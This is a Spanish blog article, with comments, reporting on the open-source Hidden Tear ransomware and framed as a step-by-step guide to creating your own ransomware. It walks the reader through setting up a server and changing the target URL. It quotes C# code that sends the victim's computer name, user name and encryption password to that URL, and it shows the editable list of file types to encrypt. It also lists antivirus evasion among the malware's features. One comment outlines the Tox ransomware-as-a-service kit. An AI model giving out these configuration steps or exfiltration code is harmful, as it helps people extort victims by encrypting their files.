Cómo crear tu propio ransomware

5
Virus de la Policía

Con este kit, sería posible hacer nuevas versiones del Virus de la Policía en un momento.

Según ha informado recientemente un investigador turco -de nombre Utku Sen- se lleva días circulando por la web de Github una versión completamente funcional de Ransomware, cuyo código es abierto y completamente accesible para cualquiera que lo quiera descargar.

Esto significa que, incluso los  más “noobs” en la materia, también llamados script-kiddies, serían capaces de crear en sencillos pasos una muestra de ransomware con la que extorsionar a la gente.

Crea tu propio ransomware Hidden Tear

Con el nombre de Hidden Tear se conoce a la muestra de ransomware que tenemos frente a nosotros. Utiliza tecnología de cifrado AES y, como tantos otros, nos apremia meiante un mensaje para que paguemos.

Esta versión actual de Hidden Tear no es detectable por los antimalware y puede ser modificada rápidamente de diferentes formas. En palabras de Sen, estaríamos ante:

Un encriptador de archivos que puede ser modificado para cumplir propósitos específicos.

No requiere de conocimientos especiales para realizar los cambios, de forma que cualquiera puede ya crear su propio ransomware para intentar sacar beneficio económico.

Ransomware de “marca blanca”

El repositorio de Github recoje el conjunto de archivos del paquete, compuestos de forma individual por:

Características de Hidden Tear

  • Cifrado mediante algoritmo AES para cifrar archivos
  • Envío de clave de cifrado a un servidor
  • Cifrado/descifrado de archivos mediante un programa específico, con clave de descifrado
  • Creación de archivo en el Escritorio de Windows, con el mensaje de alerta deseado
  • Tamaño pequeño (12 KB)
  • Evasión de todos los antivirus convencionales
¿Cómo crear tu propio ransomware con Hidden Tear?

1. Necesitarás, en primer lugar, un servidor web con soporte para lenguage de scripts: PHP o Python. Deberás cambiar la siguiente línea para poner tu propia URL, donde servirás el ransomware.

string targetURL = “https://www.example.com/hidden-tear/write.php?info=”;

2. El script deberá pasar el parámetro GET a un archivo de texto. Se utilizará la función SendPassword() en el proceso de envío:

string info = computerName + “-” + userName + ” ” + password;
var fullUrl = targetURL + info;
var conent = new System.Net.WebClient().DownloadString(fullUrl);

Hidden tear ransomware

3. Por otro lado, las extensiones de archivo afectadas puede modificarse libremente, según reza el propio documento. Sólo hay que incluirlos aquí:

var validExtensions = new[]{“.txt”, “.doc”, “.docx”, “.xls”, “.xlsx”, “.ppt”, “.pptx”, “.odt”, “.jpg”, “.png”, “.csv”, “.sql”, “.mdb”, “.sln”, “.php”, “.asp”, “.aspx”, “.html”, “.xml”, “.psd”};

hidden tear 2Aviso legal

El autor de este código dañino se pone “simpático” cuando lanza este aviso legal a los usuarios:

Aunque esto podría ser útil para algunos, existen riesgos significativos. Hidden Tear debería utilizarse sólo para fines educativos. No lo utilicéis como ransomware!. Podríais ir a la carcel símplemente por ejecutarlo, incluso si sois inocentes.

Demostración en vídeo de Hidden Tear

La demostración deja claro lo sencillo que resulta manejar esta muestra de ransomware. ¡Tened cuidado con el uso que le dáis!

Valora este artículo

  • User Ratings (4 Votes)
    9.5
Compartir.

Sobre el Autor

Alejandro es técnico micro-informático, experto en seguridad de las TIC y apasionado de la tecnología. Colabora habitualmente en diferentes publicaciones de seguridad, software y análisis de hardware entusiasta.

5 comentarios

      • Alejandro Sánchez el

        Hola David,

        ¿A qué kit te refieres? Lo cierto es que no lo conozco. He hecho una búsqueda pero no me queda demasiado claro a qué te refieres.

        Un saludo.

      • El software en línea, que se ejecuta sobre TOR, es llamado Tox y, créanlo o no, es completamente gratuito. Los desarrolladores del software apuntan a hacer dinero al tomar parte de una campaña exitosa de ransomware que sus usuarios ejecutan.

        Una vez que los usuarios se registran en el sitio, el cual tiene un diseño amigable, pueden fácilmente configurar su payload (carga útil) de ransomware al ingresar su monto deseado de rescate. Siguiendo con esto, los usuarios simplemente ingresan su “causa”, presumiblemente, el mensaje que se mostrará a los usuarios desprevenidos que están siendo rehenes de una pieza de malware y, finalmente, se le solicita a los usuarios llenar un captcha.

        “Este proceso”, explica McAfee, “genera un ejecutable de 2 MB que se disfraza en un archivo .src, entonces Tox personaliza la distribución e instalación de la forma que mejor le parece. El sitio Tox (en la red TOR) hará un seguimiento de las instalaciones y las ganancias. Para retirar tus fondos, sólo necesitas proporcionar una dirección de bitcoin”.

        http://www.seguridad.unam.mx/noticia/?noti=2324

Dejar una Respuesta

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información.

ACEPTAR